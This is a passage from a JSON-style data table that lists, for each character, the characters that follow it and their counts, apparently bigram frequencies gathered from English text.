240], ["D", 2], ["G", 10], ["F", 8], ["I", 220], ["M", 2], ["L", 2], ["O", 89], ["N", 14], ["P", 2], ["S", 28], ["R", 70], ["U", 24], ["V", 2], ["Y", 12], ["a", 1027], ["e", 2124], ["i", 779], ["j", 6], ["m", 148], ["o", 2366], ["n", 8], ["r", 642], ["u", 914], ["w", 4], ["y", 20]]], ["H", [[" ", 112], ["'", 14], [",", 8], [".", 210], ["1", 126], ["3", 42], ["2", 54], ["5", 12], ["4", 12], ["7", 12], ["6", 12], ["9", 12], ["8", 12], ["?", 2], ["A", 410], ["E", 722], ["F", 4], ["I", 298], ["M", 4], ["O", 260], ["N", 2], ["Q", 4], ["S", 6], ["R", 20], ["U", 26], ["T", 60], ["Y", 20], ["a", 2890], ["e", 16114], ["i", 2886], ["h", 2], ["m", 2], ["o", 2880], ["s", 4], ["u", 596], ["v", 2], ["y", 24]]], ["L", [["!", 2], [" ", 102], ["'", 40], [")", 2], ["-", 4], [",", 10], [".", 40], ["1", 6], ["2", 8], ["5", 2], ["4", 2], ["6", 2], ["8", 2], [":", 8], ["A", 120], ["C", 14], ["E", 261], ["D", 38], ["G", 14], ["F", 26], ["I", 210], ["H", 4], ["K", 46], ["J", 2], ["M", 6], ["L", 134], ["O", 98], ["N", 2], ["P", 4], ["S", 36], ["R", 6], ["U", 84], ["T", 12], ["W", 2], ["Y", 32], ["a", 2534], ["e", 1957], ["i", 1482], ["h", 70], ["l", 2], ["o", 2216], ["u", 614], ["w", 2], ["y", 30]]], ["P", [["!", 2], [" ", 30], ["-", 4], [".", 72], ["A", 198], ["E", 228], ["G", 8], ["I", 66], ["H", 24], ["K", 2], ["M", 8], ["L", 90], ["O", 110], ["P", 26], ["S", 18], ["R", 198], ["U", 54], ["T", 202], ["Y", 10], ["a", 2387], ["e", 1866], ["f", 50], ["i", 2690], ["h", 472], ["l", 486], ["o", 1094], ["s", 84], ["r", 4898], ["u", 314], ["t", 12], ["w", 2], ["y", 38]]], ["T", [["!", 20], [" ", 496], ["'", 18], ["*", 34], ["-", 20], [",", 66], [".", 132], [":", 6], ["A", 150], ["C", 14], ["B", 2], ["E", 2568], ["F", 2], ["I", 236], ["H", 1216], ["M", 20], ["L", 24], ["O", 330], ["N", 14], ["P", 14], ["S", 62], ["R", 71], ["U", 70], ["T", 106], ["W", 110], ["Y", 144], ["Z", 2], ["a", 643], ["e", 802], ["i", 1134], ["h", 41758], ["o", 3328], ["s", 100], ["r", 532], ["u", 500], ["w", 517], ["v", 8], ["y", 54], ["z", 4]]], ["X", [["A", 2], [" ", 22], ["C", 6], ["E", 2], ["'", 2], ["I", 444], ["-", 2], [",", 4], [".", 84], ["1", 2], ["P", 6], ["2", 2], ["u", 30], ["T", 78], ["V", 302], ["X", 266], [":", 6], ["e", 4]]], ["`", [[" ", 4], ["\"", 2], ["'", 2], ["2", 2], ["A", 122], ["C", 26], ["B", 74], ["E", 14], ["D", 38], ["G", 30], ["F", 28], ["I", 270], ["H", 66], ["K", 4], ["J", 30], ["M", 66], ["L", 44], ["O", 26], ["N", 52], ["P", 34], ["S", 80], ["R", 14], ["U", 6], ["T", 166], ["W", 92], ["V", 4], ["Y", 66], ["_", 2], ["a", 62], ["c", 32], ["b", 40], ["e", 40], ["d", 24], ["g", 28], ["f", 38], ["i", 24], ["h", 26], ["k", 6], ["j", 2], ["m", 40], ["l", 28], ["o", 24], ["n", 14], ["q", 2], ["p", 40], ["s", 34], ["r", 18], ["u", 10], ["t", 98], ["w", 22], ["v", 2], ["y", 8]]], ["d", [["!", 1346], [" ", 316392], ["\"", 78], ["'", 892], [")", 158], ["-", 2110], [",", 27454], [".", 15448], ["1", 6], [";", 2238], [":", 1318], ["?", 904], [">", 32], ["]", 6], ["_", 10], ["a", 15612], ["`", 12], ["c", 64], ["b", 98], ["e", 66856], ["d", 5952], ["g", 2672], ["f", 682], ["i", 36856], ["h", 178], ["k", 152], ["j", 316], ["m", 1162], ["l", 4894], ["o", 27386], ["n", 2680], ["q", 32], ["p", 44], ["s", 12352], ["r", 13004], ["u", 5376], ["t", 176], ["w", 382], ["v", 1300], ["y", 5438], ["z", 4], ["}", 6]]], ["h", [["!", 1480], [" ", 66490], ["\"", 16], ["'", 580], [")", 46], ["-", 674], [",", 7634], [".", 3060], [";", 500], [":", 124], ["?", 354], [">", 8], ["_", 8], ["a", 130321], ["`", 2], ["c", 78], ["b", 454], ["e", 366316], ["d", 180], ["g", 2], ["f", 464], ["i", 118000], ["h", 16], ["k", 98], ["m", 1012], ["l", 810], ["o", 56794], ["n", 878], ["q", 34], ["p", 20], ["s", 1392], ["r", 8693], ["u", 9628], ["t", 23686], ["w", 410], ["v", 4], ["y", 4342], ["z", 2]]], ["l", [["!", 688], [" ", 55493], ["\"", 28], ["'", 776], [")", 58], ["*", 8], ["-", 1168], [",", 9058], ["/", 2], [".", 4175], ["1", 2], ["2", 4], [";", 588], [":", 138], ["?", 512], [">", 18], ["@", 2], ["]", 2], ["_", 14], ["a", 40424], ["c", 880], ["b", 428], ["e", 90647], ["d", 35897], ["g", 498], ["f", 11866], ["i", 53960], ["h", 30], ["k", 3952], ["j", 880], ["m", 2350], ["l", 72010], ["o", 43088], ["n", 488], ["q", 6], ["p", 1936], ["s", 9240], ["r", 1482], ["u", 8878], ["t", 7890], ["w", 1710], ["v", 3288], ["y", 43772], ["x", 2], ["z", 52]]], ["p", [["!", 222], [" ", 12684], ["\"", 12], ["'", 274], [")", 8], ["*", 16], ["-", 458], [",", 2678], [".", 1598], [";", 206], [":", 32], ["?", 102], [">", 2], ["_", 2], ["a", 24384], ["c", 110], ["b", 74], ["e", 40018], ["d", 12], ["g", 26], ["f", 100], ["i", 12578], ["h", 3890], ["k", 248], ["m", 220], ["l", 19938], ["o", 24960], ["n", 82], ["p", 12676], ["s", 4980], ["r", 27372], ["u", 7468], ["t", 8624], ["w", 150], ["y", 1538], ["z", 4]]], ["t", [["!", 1698], [" ", 244288], ["\"", 74], ["'", 4144], [")", 206], ["*", 10], ["-", 2634], [",", 24442], ["/", 22], [".", 15012], ["9", 30], [";", 1952], [":", 386], ["?", 2014], [">", 34], ["@", 16], ["I", 4], ["N", 2], ["]", 6], ["_", 20], ["a", 36864], ["c", 4804], ["b", 164], ["e", 93708], ["d", 32], ["g", 50], ["f", 1186], ["i", 67393], ["h", 380618], ["k", 30], ["j", 2], ["m", 1109], ["l", 15192], ["o", 120320], ["n", 980], ["p", 168], ["s", 20376], ["r", 31046], ["u", 18070], ["t", 25046], ["w", 8348], ["v", 6], ["y", 14950], ["x", 22], ["z", 596]]], ["x", [["!", 16], [" ", 1654], ["'", 108], [")", 6], ["-", 174], [",", 480], ["/", 2], [".", 262], ["1", 10], [";", 40], [":", 6], ["?", 20], ["_", 4], ["a", 1314], ["c", 2462], ["b", 4], ["e", 1456], ["g", 2], ["f", 26], ["i", 1676], ["h", 354], ["l", 20], ["o", 82], ["q", 56], ["p", 3828], ["s", 6], ["u", 144], ["t", 3514], ["w", 4], ["y", 88], ["x", 30]]], ["|", [[" ", 30], ["C", 294]]], ["#", [["1", 6], [" ", 2]]], ["'", [["!", 22], [" ", 5218], ["\"", 130], ["'", 52], [")", 8], ["-", 136], [",", 274], [".", 194], ["9", 24], ["8", 10], [";", 12], [":", 4], ["?", 40], ["A", 506], ["C", 94], ["B", 292], ["E", 88], ["D", 124], ["G", 154], ["F", 90], ["I", 826], ["H", 360], ["K", 12], ["J", 52], ["M", 174], ["L", 102], ["O", 202], ["N", 222], ["Q", 12], ["P", 86], ["S", 328], ["R", 24], ["U", 38], ["T", 922], ["W", 482], ["V", 22], ["Y", 356], ["a", 288], ["c", 614], ["b", 42], ["e", 614], ["d", 2832], ["g", 48], ["f", 28], ["i", 98], ["h", 36], ["k", 6], ["m", 1148], ["l", 1792], ["o", 90], ["n", 44], ["q", 2], ["p", 40], ["s", 16835], ["r", 660], ["u", 62], ["t", 7172], ["w", 60], ["v", 880], ["y", 66], ["}", 2]]], ["+", [[";", 2], ["B", 2], ["-", 4]]], ["/", [[" ", 26], ["\"", 2], ["e", 20], ["I", 14], ["h", 6], ["1", 2], ["s", 2], ["2", 4], ["5", 4], ["4", 2], ["6", 2]]], ["3", [["!", 2], [" ", 76], [")", 18], ["*", 8], ["-", 6], [",", 98], ["/", 2], [".", 66], ["1", 54], ["0", 158], ["3", 44], ["2", 60], ["5", 42], ["4", 18], ["7", 38], ["6", 24], ["9", 26], ["8", 20], [";", 10], [":", 48], ["?", 2], ["@", 4], ["]", 60], ["d", 6], ["i", 4], ["h", 2], ["r", 50], ["t", 26], ["v", 2], ["}", 18], ["|", 38]]], ["7", [["!", 2], [" ", 64], ["'", 10], ["-", 8], [",", 68], ["/", 4], [".", 46], ["1", 21], ["0", 36], ["3", 12], ["2", 35], ["5", 16], ["4", 14], ["7", 32], ["6", 26], ["9", 40], ["8", 34], [";", 10], [":", 28], ["@", 18], ["]", 48], ["h", 2], ["m", 4], ["t", 34], ["}", 18], ["|", 26]]], [";", [[" ", 14368], ["\"", 42], ["'", 54], ["h", 2], ["*", 2], ["-", 146], [",", 2], ["[", 4]]], ["?", [[" ", 5000], ["\"", 7386], ["'", 680], [")", 14], ["-", 90], [",", 2], [".", 118], ["[", 2], ["?", 2], [">", 2]]], ["C", [[" ", 50], ["\"", 14], ["'", 12], ["*", 2], ["-", 4], [",", 6], ["/", 2], [".", 24], ["A", 126], ["C", 22], ["E", 112], ["D", 20], ["I", 76], ["H", 3260], ["K", 60], ["L", 26], ["O", 164], ["P", 6], ["S", 8], ["R", 38], ["U", 26], ["T", 117], ["Y", 16], ["a", 2763], ["e", 294], ["i", 277], ["h", 2428], ["l", 446], ["o", 4926], ["s", 4], ["r", 556], ["u", 212], ["y", 42], ["z", 24]]], ["G", [["!", 2], [" ", 132], ["\"", 8], ["'", 8], ["-", 56], [",", 22], [".", 10], [";", 2], [":", 2], ["?", 4], ["A", 72], ["E", 134], ["G", 10], ["F", 2], ["I", 34], ["H", 70], ["L", 16], ["O", 60], ["N", 14], ["S", 10], ["R", 64], ["U", 92], ["T", 2], ["Y", 2], ["Z", 2], ["a", 744], ["e", 958], ["d", 2], ["i", 460], ["h", 266], ["l", 212], ["o", 2628], ["n", 6], ["r", 1160], ["u", 880], ["w", 2], ["y", 2]]], ["K", [[" ", 28], ["'", 2], [",", 6], [".", 8], ["?", 2], ["A", 4], ["E", 64], ["F", 2], ["I", 44], ["H", 2], ["K", 4], ["L", 12], ["O", 2], ["N", 4], ["S", 12], ["R", 6], ["U", 2], ["W", 4], ["Y", 2], ["a", 442], ["e", 504], ["i", 860], ["h", 122], ["l", 40], ["o", 290], ["n", 96], ["r", 96], ["u", 782], ["y", 10]]], ["O", [["!", 6], [" ", 466], ["\"", 2], ["'", 106], ["-", 4], [",", 12], [".", 38], [":", 2], ["?", 2], ["A", 6], ["C", 47], ["B", 32], ["E", 13], ["D", 52], ["G", 52], ["F", 288], ["I", 18], ["H", 28], ["K", 222], ["J", 50], ["M", 160], ["L", 98], ["O", 78], ["N", 489], ["P", 30], ["S", 64], ["R", 346], ["U", 338], ["T", 104], ["W", 64], ["V", 39], ["Y", 8], ["Z", 2], ["a", 2], ["c", 234], ["b", 128], ["e", 2], ["d", 26], ["g", 14], ["f", 1458], ["i", 6], ["h", 1000], ["k", 2], ["m", 60], ["l", 240], ["o", 44], ["n", 3744], ["p", 86], ["s", 22], ["r", 798], ["u", 554], ["t", 162], ["w", 32], ["v", 74], ["y", 2], ["x", 6], ["z", 68]]], ["S", [["!", 8], [" ", 616], ["'", 12], ["*", 6], ["-", 20], [",", 40], [".", 122], [";", 2], [":", 12], ["?", 2], ["A", 56], ["C", 58], ["E", 296], ["D", 2], ["G", 4], ["F", 4], ["I", 91], ["H", 76], ["K", 8], ["M", 14], ["L", 10], ["O", 98], ["N", 2], ["Q", 4], ["P", 30], ["S", 104], ["R", 2], ["U", 42], ["T", 322], ["W", 4], ["Y", 2], ["a", 2150], ["c", 1208], ["e", 1405], ["i", 968], ["h", 5152], ["k", 34], ["m", 374], ["l", 166], ["o", 4132], ["n", 120], ["q", 44], ["p", 776], ["s", 2], ["u", 1246], ["t", 1564], ["w", 144], ["v", 8], ["y", 126], ["z", 18]]], ["W", [["!", 2], [" ", 58], [")", 2], [",", 10], [".", 28], ["A", 136], ["E", 96], ["D", 4], ["G", 2], ["I", 90], ["H", 128], ["L", 4], ["O", 76], ["N", 12], ["S", 2], ["R", 8], ["Y", 4], ["a", 1096], ["e", 4362], ["i", 2096], ["h", 10098], ["o", 1611], ["r", 58], ["u", 18]]], ["[", [["*", 2], ["1", 112], ["3", 56], ["2", 112], ["5", 30], ["4", 40], ["7", 4], ["6", 34], ["9", 4], ["8", 2], ["A", 12], ["C", 2], ["B", 6], ["E", 24], ["D", 4], ["G", 14], ["F", 2], ["I", 22], ["H", 30], ["J", 34], ["M", 28], ["L", 16], ["N", 4], ["P", 42], ["S", 6], ["R", 36], ["T", 18], ["W", 4], ["a", 2], ["b", 4], ["d", 2], ["g", 2], ["f", 14], ["m", 2], ["l", 4], ["o", 4], ["p", 6], ["s", 4], ["t", 50]]], ["_", [[" ", 100], ["'", 2], ["-", 12], [",", 38], [".", 28], [";", 4], ["A", 14], ["D", 2], ["I", 30], ["H", 4], ["M", 4], ["L", 2], ["O", 2], ["N", 2], ["T", 12], ["_", 736], ["^", 6], ["a", 14], ["c", 12], ["b", 4], ["e", 6], ["d", 6], ["f", 14], ["i", 4], ["h", 2], ["m", 8], ["l", 6], ["o", 2], ["n", 14], ["p", 4], ["s", 10], ["r", 2], ["u", 4], ["t", 10], ["w", 8], ["v", 4], ["y", 4], ["x", 4]]], ["c", [["!", 38], [" ", 2940], ["\"", 6], ["'", 62], ["-", 122], [",", 498], [".", 480], [";", 56], [":", 18], ["?", 22], ["C", 8], ["G", 8], ["F", 2], ["L", 230], ["Q", 2], ["P", 2], ["S", 2], ["a", 38996], ["c", 5012], ["e", 54872], ["d", 38], ["i", 13186], ["h", 55038], ["k", 20111], ["m", 4], ["l", 12408], ["o", 57624], ["n", 26], ["q", 496], ["p", 66], ["s", 944], ["r", 13732], ["u", 9748], ["t", 19868], ["w", 8], ["v", 6], ["y", 1692], ["z", 12]]], ["g", [["!", 572], [" ", 77496], ["\"", 32], ["'", 490], [")", 44], ["-", 1388], [",", 8820], [".", 5284], [";", 654], [":", 276], ["?", 530], [">", 4], ["a", 16556], ["c", 8], ["b", 10], ["e", 31120], ["d", 134], ["g", 3662], ["f", 14], ["i", 11514], ["h", 36708], ["m", 368], ["l", 8714], ["o", 16464], ["n", 4300], ["p", 22], ["s", 6714], ["r", 16774], ["u", 6849], ["t", 1104], ["w", 42], ["y", 516], ["z", 14], ["}", 8]]], ["k", [["!", 306], [" ", 20132], ["\"", 14], ["'", 392], [")", 32], ["-", 554], [",", 4148], [".", 2414], ["1", 2], [";", 294], [":", 60], ["?", 214], [">", 10], ["@", 10], ["a", 870], ["c", 66], ["b", 38], ["e", 34087], ["d", 24], ["g", 58], ["f", 344], ["i", 13220], ["h", 948], ["k", 244], ["j", 22], ["m", 100], ["l", 2880], ["o", 816], ["n", 11134], ["q", 2], ["p", 12], ["s", 4228], ["r", 68], ["u", 68], ["t", 20], ["w", 314], ["v", 10], ["y", 768], ["z", 2]]], ["o", [["!", 648], [" ", 114177], ["\"", 18], ["'", 1162], [")", 38], ["-", 958], [",", 5210], [".", 2232], [";", 354], [":", 58], ["?", 516], ["K", 2], ["J", 2], ["]", 4], ["_", 6], ["a", 7834], ["`", 2], ["c", 9710], ["b", 5854], ["e", 2996], ["d", 16602], ["g", 5294], ["f", 99287], ["i", 10524], ["h", 872], ["k", 14852], ["j", 986], ["m", 51326], ["l", 30027], ["o", 36626], ["n", 131194], ["q", 172], ["p", 16136], ["s", 26802], ["r", 99219], ["u", 128095], ["t", 47116], ["w", 48246], ["v", 20522], ["y", 3366], ["x", 840], ["z", 456], ["}", 2]]], ["s", [["!", 2144], [" ", 245069], ["\"", 154], ["'", 1554], [")", 266], ["*", 14], ["-", 1948], [",", 37726], [".", 19990], ["1", 4], [";", 3000], [":", 928], ["=", 2], ["?", 1424], [">", 50], ["[", 6], ["]", 38], ["_", 24], ["a", 37342], ["c", 11410], ["b", 1092], ["e", 89922], ["d", 372], ["g", 288], ["f", 1206], ["i", 41018], ["h", 48184], ["k", 7002], ["j", 20], ["m", 5638], ["l", 7892], ["o", 41490], ["n", 2836], ["q", 1070], ["p", 17022], ["s", 38918], ["r", 118], ["u", 22362], ["t", 98283], ["w", 5082], ["v", 104], ["y", 2112], ["z", 8]]], ["w", [["!", 302], [" ", 25552], ["\"", 32], ["'", 332], [")", 38], ["-", 630], [",", 4620], ["/", 2], [".", 2130], [";", 296], [":", 56], ["?", 312], [">", 6], ["_", 4], ["a", 69912], ["c", 62], ["b", 88], ["e", 43746], ["d", 980], ["g", 230], ["f", 300], ["i", 50742], ["h", 55558], ["k", 232], ["j", 2], ["m", 12], ["l", 1768], ["o", 28157], ["n", 11280], ["p", 14], ["s", 3452], ["r", 3078], ["u", 116], ["t", 106], ["w", 8], ["y", 240], ["z", 2]]], ["{", [["`", 2], ["c", 2], ["E", 2], ["G", 2], ["s", 6], ["o", 4], ["1", 224], ["3", 226], ["2", 230], ["5", 24], ["4", 34], ["7", 22], ["6", 22], ["9", 22], ["8", 24], ["t", 8]]], ["\"", [[" ", 19496], ["\"", 12], ["'", 120], [")", 34], ["*", 70], ["-", 198], [",", 42], [".", 98], ["1", 4], ["3", 2], ["2", 4], ["5", 4], ["4", 4], ["6", 2], ["8", 6], [";", 74], [":", 2], ["?", 4], ["A", 4542], ["C", 1250], ["B", 2388], ["E", 472], ["D", 1474], ["G", 1096], ["F", 924], ["I", 8984], ["H", 2746], ["K", 138], ["J", 270], ["M", 1850], ["L", 912], ["O", 1848], ["N", 2630], ["Q", 110], ["P", 880], ["S", 1906], ["R", 350], ["U", 236], ["T", 5524], ["W", 6722], ["V", 340], ["Y", 4228], ["X", 4], ["[", 14], ["Z", 6], ["]", 8], ["_", 20], ["a", 732], ["`", 158], ["c", 118], ["b", 452], ["e", 46], ["d", 138], ["g", 54], ["f", 182], ["i", 408], ["h", 256], ["k", 10], ["j", 14], ["m", 148], ["l", 118], ["o", 112], ["n", 94], ["q", 4], ["p", 130], ["s", 230], ["r", 36], ["u", 32], ["t", 1014], ["w", 398], ["v", 22], ["y", 272]]], ["&", [["h", 2], ["c", 8], [" ", 26]]], ["*", [[" ", 206], ["\"", 146], [")", 6], ["*", 636], [",", 12], [".", 4], [":", 8], [">", 2], ["A", 16], ["C", 4], ["B", 16], ["E", 20], ["D", 8], ["G", 2], ["F", 12], ["I", 6], ["H", 4], ["K", 4], ["L", 4], ["O", 6], ["N", 2], ["P", 2], ["S", 16], ["T", 92], ["W", 18], ["V", 14], ["Y", 2], ["[", 36], ["]", 54], ["n", 6]]], [".", [["!", 36], [" ", 88376], ["\"", 12990], ["'", 1624], [")", 132], ["(", 2], ["*", 27], ["-", 436], [",", 236], [".", 4176], ["0", 16], ["2", 8], ["4", 6], ["7", 2], ["6", 2], ["9", 14], [";", 20], [":", 166], ["?", 38], ["A", 46], ["C", 12], ["B", 12], ["E", 20], ["D", 4], ["G", 22], ["F", 12], ["I", 138], ["H", 38], ["K", 2], ["J", 2], ["M", 34], ["L", 10], ["O", 10], ["N", 20], ["Q", 2], ["P", 8], ["S", 38], ["R", 2], ["U", 4], ["T", 108], ["W", 42], ["V", 6], ["Y", 20], ["[", 26], ["]", 10], ["_", 8], ["a", 4], ["`", 6], ["c", 32], ["b", 2], ["e", 36], ["i", 16], ["m", 26], ["o", 2], ["s", 4], ["u", 24], ["t", 40], ["x", 10], ["z", 2]]], ["2", [[" ", 128], ["\"", 2], ["'", 6], [")", 12], ["*", 6], ["-", 20], [",", 132], ["/", 2], [".", 82], ["1", 127], ["0", 229], ["3", 90], ["2", 98], ["5", 112], ["4", 96], ["7", 78], ["6", 88], ["9", 51], ["8", 80], [";", 4], [":", 56], ["@", 14], ["]", 70], ["d", 6], ["n", 28], ["t", 20], ["}", 20], ["|", 66]]], ["6", [[" ", 60], ["-", 12], [",", 70], ["/", 2], [".", 30], ["1", 24], ["0", 76], ["3", 14], ["2", 34], ["5", 26], ["4", 19], ["7", 26], ["6", 32], ["9", 21], ["8", 22], [";", 10], [":", 32], ["?", 2], ["@", 10], ["]", 44], ["m", 4], ["t", 68], ["}", 18], ["|", 52]]], [":", [[" ", 3056], ["\"", 2], ["'", 20], [")", 2], ["(", 8], ["*", 2], ["-", 1142], [".", 260], ["1", 118], ["I", 4], ["3", 44], ["2", 90], ["5", 14], ["4", 30], ["7", 14], ["6", 16], ["9", 12], ["8", 12], ["R", 4], ["r", 4]]], [">", [[" ", 88], ["#", 2], ["\"", 4], ["$", 2], ["-", 2], [",", 2], [":", 2], ["<", 24], ["A", 2], ["@", 2], ["C", 2], ["F", 8], ["I", 10], ["M", 2], ["L", 2], ["T", 14], ["W", 4], ["_", 2], ["^", 2], ["a", 6], ["c", 8], ["f", 10], ["i", 12], ["h", 6], ["m", 8], ["o", 8], ["p", 2], ["s", 8], ["t", 8], ["w", 6], ["v", 2], ["{", 2]]], ["B", [[" ", 16], ["'", 2], [",", 4], [".", 12], ["A", 44], ["C", 38], ["B", 6], ["E", 200], ["I", 62], ["K", 702], ["M", 6], ["L", 69], ["O", 247], ["S", 8], ["R", 26], ["U", 52], ["Y", 62], ["a", 2602], ["e", 3594], ["i", 1068], ["h", 100], ["j", 2], ["l", 520], ["o", 2392], ["r", 974], ["u", 8016], ["w", 2], ["y", 828]]], ["F", [["A", 194], [" ", 300], ["E", 36], ["F", 18], ["I", 98], ["j", 2], ["l", 372], ["O", 166], [",", 2], [">", 2], ["i", 958], ["r", 5046], ["U", 14], ["o", 3334], ["a", 2482], ["e", 430], ["R", 78], [".", 10], ["u", 184], ["L", 20], ["T", 30]]], ["J", [["A", 18], ["a", 1388], ["E", 82], ["d", 2], ["'", 2], ["I", 2], ["-", 2], ["o", 2830], [".", 132], ["i", 314], ["s", 2], ["U", 30], ["O", 54], ["e", 1904], ["u", 1679]]], ["N", [["!", 6], [" ", 451], ["\"", 8], ["'", 28], ["-", 4], [",", 48], [".", 96], [";", 2], [":", 8], ["?", 2], ["A", 108], ["C", 124], ["B", 48], ["E", 247], ["D", 328], ["G", 216], ["F", 2], ["I", 92], ["H", 2], ["K", 22], ["J", 2], ["L", 4], ["O", 186], ["N", 40], ["S", 124], ["R", 13], ["U", 20], ["T", 298], ["V", 13], ["Y", 14], ["a", 3392], ["e", 2202], ["i", 1384], ["o", 4850], ["u", 72]]], ["R", [["!", 2], [" ", 2352], ["\"", 4], ["'", 20], ["*", 6], ["-", 4], [",", 78], [".", 718], [":", 2], ["?", 2], ["A", 178], ["C", 20], ["B", 12], ["E", 320], ["D", 100], ["G", 68], ["F", 4], ["I", 219], ["K", 70], ["M", 30], ["L", 42], ["O", 189], ["N", 84], ["Q", 2], ["P", 18], ["S", 90], ["R", 70], ["U", 34], ["T", 272], ["W", 16], ["V", 14], ["Y", 93], ["a", 374], ["e", 1237], ["i", 323], ["h", 52], ["o", 2304], ["u", 2014], ["t", 2], ["y", 20]]], ["V", [["A", 47], ["a", 1798], ["B", 2], ["E", 276], ["'", 2], [" ", 18], ["I", 587], ["-", 2], [",", 12], ["O", 26], ["l", 30], ["i", 510], ["r", 4], ["U", 2], ["o", 228], ["y", 26], ["e", 465], ["R", 22], [".", 162], ["u", 4], ["Y", 6]]], ["Z", [["a", 32], ["\"", 2], ["E", 16], ["d", 4], ["I", 2], ["h", 68], [",", 4], ["o", 22], ["n", 30], ["i", 26], ["u", 10], ["O", 4], ["e", 124]]], ["b", [["!", 40], [" ", 1058], ["'", 68], [")", 4], ["*", 4], ["-", 98], [",", 414], [".", 244], [";", 24], [":", 6], ["?", 36], [">", 4], ["a", 13924], ["c", 22], ["b", 1618], ["e", 60104], ["d", 78], ["g", 4], ["f", 16], ["i", 6998], ["h", 46], ["j", 990], ["m", 324], ["l", 22082], ["o", 19980], ["n", 44], ["s", 2992], ["r", 13256], ["u", 20366], ["t", 1570], ["w", 30], ["v", 88], ["y", 13906]]], ["f", [["!", 178], [" ", 90391], ["\"", 8], ["'", 72], [")", 16], ["*", 2], ["-", 876], [",", 2770], [".", 1846], [";", 240], [":", 102], ["?", 144], ["G", 2], ["I", 2], ["a", 20108], ["c", 14], ["b", 38], ["e", 23990], ["d", 2], ["g", 10], ["f", 10886], ["i", 22788], ["h", 6], ["k", 12], ["j", 16], ["m", 12], ["l", 7808], ["o", 46468], ["n", 16], ["p", 2], ["s", 464], ["r", 21052], ["u", 10540], ["t", 10202], ["w", 62], ["v", 2], ["y", 396], ["x", 2]]], ["j", [["a", 724], ["!", 2], ["e", 4002], ["'", 2], ["i", 118], ["o", 3558], [".", 4], ["u", 4654]]], ["n", [["!", 1140], [" ", 164227], ["\"", 84], ["'", 9982], [")", 108], ["*", 6], ["-", 2184], [",", 19804], [".", 11592], [";", 1670], [":", 478], ["?", 1178], [">", 50], ["J", 4], ["]", 18], ["_", 4], ["a", 17316], ["c", 30762], ["b", 372], ["e", 74881], ["d", 155134], ["g", 116276], ["f", 3720], ["i", 23814], ["h", 996], ["k", 7828], ["j", 896], ["m", 518], ["l", 7014], ["o", 57750], ["n", 7832], ["q", 950], ["p", 298], ["s", 29725], ["r", 506], ["u", 4864], ["t", 72732], ["w", 558], ["v", 3580], ["y", 9090], ["x", 498], ["z", 154], ["}", 4]]], ["r", [["!", 1102], [" ", 128583], ["\"", 78], ["'", 2438], [")", 108], ["*", 14], ["-", 2050], [",", 18518], [".", 12898], [";", 1346], [":", 332], ["?", 1112], [">", 28], ["A", 2], ["@", 14], ["_", 6], ["a", 45838], ["c", 7992], ["b", 2520], ["e", 175663], ["d", 22490], ["g", 6450], ["f", 3064], ["i", 57977], ["h", 1474], ["k", 6764], ["j", 14], ["m", 12284], ["l", 8396], ["o", 61720], ["n", 15999], ["q", 220], ["p", 3358], ["s", 36440], ["r", 17042], ["u", 12282], ["t", 29678], ["w", 1522], ["v", 4906], ["y", 24200], ["x", 6], ["z", 128]]], ["v", [["!", 34], [" ", 1478], ["'", 360], [")", 2], ["-", 58], [",", 566], [".", 316], [";", 12], [":", 4], ["?", 30], ["_", 2], ["a", 8210], ["e", 85189], ["g", 2], ["i", 17242], ["k", 2], ["m", 16], ["l", 218], ["o", 6350], ["n", 508], ["s", 216], ["r", 658], ["u", 248], ["t", 4], ["v", 22], ["y", 640]]], ["z", [["!", 8], [" ", 344], ["\"", 2], ["'", 14], [")", 4], ["-", 40], [",", 172], [".", 178], [";", 8], [":", 2], ["?", 22], ["a", 592], ["b", 6], ["e", 3788], ["d", 18], ["g", 8], ["i", 920], ["h", 122], ["k", 6], ["m", 104], ["l", 356], ["o", 1122], ["n", 2], ["s", 6], ["r", 2], ["u", 156], ["v", 14], ["y", 202], ["z", 622]]], ["~", [[")", 6]]], ["\t", [["\t", 174], [" ", 136], ["D", 2]]], ["!", [["!", 12], [" ", 7580], ["\"", 6860], ["'", 556], [")", 42], ["*", 12], ["-", 108], [",", 4], [".", 170], ["I", 2], ["v", 6], ["[", 2], ["_", 6]]], ["%", [[" ", 8]]], [")", [[" ", 830], ["-", 56], [",", 506], [".", 102], ["5", 2], ["[", 2], [":", 16], [";", 58], ["?", 2]]], ["-", [["!", 8], [" ", 5090], ["\"", 550], ["'", 68], ["(", 2], ["+", 4], ["-", 6008], [",", 22], [".", 2], ["1", 12], ["2", 16], ["5", 24], ["4", 2], ["7", 4], ["6", 6], ["8", 4], ["?", 22], ["A", 170], ["C", 118], ["B", 200], ["E", 88], ["D", 116], ["G", 118], ["F", 62], ["I", 194], ["H", 172], ["K", 16], ["J", 90], ["M", 196], ["L", 74], ["O", 38], ["N", 44], ["Q", 6], ["P", 134], ["S", 172], ["R", 44], ["T", 160], ["W", 74], ["V", 28], ["Y", 22], ["Z", 4], ["a", 1098], ["`", 16], ["c", 1092], ["b", 1366], ["e", 476], ["d", 942], ["g", 452], ["f", 1014], ["i", 408], ["h", 966], ["k", 224], ["j", 64], ["m", 808], ["l", 922], ["o", 468], ["n", 446], ["q", 40], ["p", 884], ["s", 1836], ["r", 562], ["u", 122], ["t", 1410], ["w", 812], ["v", 66], ["y", 140], ["z", 12]]], ["1", [[" ", 112], ["'", 4], [")", 16], ["*", 10], ["-", 14], [",", 112], ["/", 2], [".", 68], ["1", 246], ["0", 318], ["3", 164], ["2", 280], ["5", 224], ["4", 214], ["7", 188], ["6", 204], ["9", 126], ["8", 572], [";", 4], [":", 40], ["@", 4], ["O", 2], ["]", 48], ["s", 52], ["t", 22], ["}", 18], ["|", 88]]], ["5", [[" ", 98], ["\"", 2], ["'", 2], ["-", 4], [",", 88], [".", 46], ["1", 22], ["0", 140], ["3", 28], ["2", 32], ["5", 32], ["4", 22], ["7", 32], ["6", 16], ["9", 14], ["8", 18], [";", 10], [":", 48], ["?", 2], ["@", 14], ["]", 64], ["t", 82], ["}", 18], ["|", 44]]], ["9", [[" ", 74], ["'", 2], [")", 4], ["-", 6], [",", 40], [".", 22], ["1", 26], ["0", 43], ["3", 48], ["2", 14], ["5", 18], ["4", 15], ["7", 34], ["6", 20], ["9", 18], ["8", 10], [";", 12], [":", 38], ["@", 6], ["]", 44], ["t", 32], ["}", 18], ["|", 46]]], ["=", [["E", 2], ["=", 8], ["T", 14], [" ", 12]]], ["A", [[" ", 4464], ["\"", 2], ["'", 12], ["-", 18], [",", 4], [".", 24], ["A", 6], ["C", 108], ["B", 58], ["E", 22], ["D", 77], ["G", 50], ["F", 18], ["I", 98], ["H", 10], ["K", 18], ["M", 89], ["L", 